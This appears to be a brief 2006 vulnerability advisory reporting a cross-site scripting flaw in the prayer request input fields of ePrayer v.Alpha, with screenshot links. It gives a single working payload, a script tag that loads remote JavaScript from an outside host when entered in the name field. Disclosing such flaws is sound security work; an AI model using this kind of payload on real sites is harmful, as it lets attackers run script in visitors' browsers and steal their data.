Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13208
HistoryJun 16, 2006 - 12:00 a.m.

ePrayver v.Alpha - XSS

2006-06-1600:00:00
vulners.com
8

Eprayer v.Alpha.

Homepage:
http://eprayer.sourceforge.net

Affected files:

input boxs of prayer request.

User submitted data is not sanatized before being dynamically generated. Try putting the code below in
as "Your name"

<SCRIPT SRC=http://youfucktard.com/xss.js&gt;&lt;/SCRIPT&gt;

Screenshots:

http://www.youfucktard.com/xsp/eprayer1.jpg
http://www.youfucktard.com/xsp/eprayer2.jpg